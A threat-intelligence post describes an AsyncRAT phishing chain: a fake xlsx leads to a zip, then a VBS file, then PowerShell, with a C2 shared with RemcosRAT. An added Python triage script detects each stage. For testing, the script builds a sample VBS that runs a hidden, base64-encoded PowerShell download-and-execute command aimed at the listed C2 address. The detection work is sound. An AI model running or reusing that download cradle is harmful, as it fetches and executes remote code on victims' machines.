
Cybercrime, AsyncRAT campaign via payment request

AsyncRAT campaign also distributed via a fake payment request. The bogus xlsx attachment in the email points to a fake site hosting a zip archive. The archive contains a VBS file that runs PowerShell to download the malware. The C2 is the same one used by RemcosRAT.

AsyncRAT is hiding behind a fake payment request from a Chinese company. The email, which has also reached Italy, carries what looks like an xlsx attachment but is actually an image.

Opening it redirects the victim to a fake site that serves a zip archive posing as the purchase order.

Inside, however, is a VBS file that launches PowerShell, which downloads the malware.

The malware connects to the command-and-control server 79.134.225.100, the same one used since January by another malicious code: RemcosRAT.

[Screenshot: Base64 decoding]

[Screenshot: Persistence]
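The triage script below is an added example, not code from the original post or from the analysis it summarises. It walks the chain described above: it checks an attachment's real file type against its claimed extension (a genuine xlsx is a ZIP container, an image is not), lists script members inside the downloaded zip, and decodes the base64 blobs found in the VBS, treating them as UTF-16LE when they look like a PowerShell -EncodedCommand. The attachment bytes, the archive and the VBS it contains are constructed here to exercise the checks; the only indicator taken from the post is the C2 address 79.134.225.100, and the URL built on it is a placeholder, not the campaign's real download location. The persistence mechanism is not described on the page, so it is not modelled.

```python
"""Triage helpers for the fake-xlsx -> zip -> VBS -> PowerShell lure.

Added example. The sample attachment, archive and VBS are constructed, not
the campaign's real artefacts.
"""
import base64
import io
import re
import zipfile

# Leading magic bytes: a real .xlsx/.docx is an OOXML container, i.e. a ZIP.
MAGIC = {
    b"PK\x03\x04": "zip/ooxml",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF8": "gif",
}
EXPECTED_FOR_EXT = {"xlsx": "zip/ooxml", "docx": "zip/ooxml", "zip": "zip/ooxml"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".lnk")

# The C2 reported in the post (shared with RemcosRAT).
KNOWN_C2 = {"79.134.225.100"}

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def sniff_type(data: bytes) -> str:
    """Identify a file by its leading bytes, ignoring the name."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def extension_mismatch(filename: str, data: bytes):
    """Return (claimed_ext, real_type, mismatch) for an attachment."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    real = sniff_type(data)
    expected = EXPECTED_FOR_EXT.get(ext)
    return ext, real, expected is not None and real != expected


def scripts_in_zip(zip_bytes: bytes):
    """Archive members with a script extension, double extensions included."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(SCRIPT_EXTS)]


def decode_b64_blobs(text: str):
    """Decode long base64 runs; -EncodedCommand payloads are UTF-16LE."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # ASCII text in UTF-16LE has a zero byte in every odd position.
        if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
            out.append(raw.decode("utf-16-le", errors="replace"))
        else:
            out.append(raw.decode("utf-8", errors="replace"))
    return out


def ioc_hits(decoded_texts):
    """IPv4 addresses in decoded stages that match the known C2 list."""
    return sorted({ip for t in decoded_texts for ip in IP_RE.findall(t) if ip in KNOWN_C2})


def triage(attachment_name: str, attachment: bytes, zip_bytes: bytes) -> dict:
    ext, real, mismatch = extension_mismatch(attachment_name, attachment)
    scripts = scripts_in_zip(zip_bytes)
    decoded = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in scripts:
            decoded += decode_b64_blobs(zf.read(name).decode("latin-1"))
    return {"claimed": ext, "real": real, "mismatch": mismatch,
            "scripts": scripts, "decoded": decoded, "c2": ioc_hits(decoded)}


def build_samples():
    """Constructed inputs: a JPEG header saved as 'pagamento.xlsx' and a zip
    holding a VBS that runs an encoded PowerShell download cradle."""
    lure = b"\xff\xd8\xff\xe0" + b"\x00" * 32
    ps = "IEX (New-Object Net.WebClient).DownloadString('http://79.134.225.100/')"
    enc = base64.b64encode(ps.encode("utf-16-le")).decode()
    vbs = ('Set sh = CreateObject("WScript.Shell")\r\n'
           f'sh.Run "powershell -nop -w hidden -enc {enc}", 0, False\r\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Purchase Order.pdf.vbs", vbs)
    return lure, buf.getvalue()


if __name__ == "__main__":
    lure, archive = build_samples()
    for k, v in triage("pagamento.xlsx", lure, archive).items():
        print(f"{k}: {v}")
```

On a real mailbox sample, feed `triage()` the attachment bytes as received and the zip fetched from the lure site in a sandbox; a claimed xlsx that sniffs as jpeg/png, a script member with a double extension, and a decoded stage pointing at the listed C2 are each sufficient on their own to classify the message as malicious.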
